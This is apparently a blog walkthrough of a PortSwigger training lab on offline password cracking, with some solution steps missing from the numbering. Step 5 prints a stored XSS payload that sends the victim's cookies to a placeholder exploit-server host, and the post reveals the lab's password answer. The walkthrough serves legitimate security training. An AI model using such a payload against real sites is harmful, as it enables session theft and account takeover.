Post

PortSwigger - Authentication - Lab 10

Lab 10 - Offline password cracking

Lab Objective:

This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the “My account” page.

Your credentials: wiener:peter
Victim's username: carlos

Reference:
Port Swigger - Lab 10

Solution


4. Go to the exploit server and make a note of the URL.

5. Go to one of the blogs and post a comment containing the following stored XSS payload, remembering to enter your own exploit server ID:

<script>document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>

8. Copy the hash and paste it into a search engine. This will reveal that the password is onceuponatime

9. Log in to the victim’s account, go to the My account page, and delete their account to solve the lab.


This post is licensed under CC BY 4.0 by the author.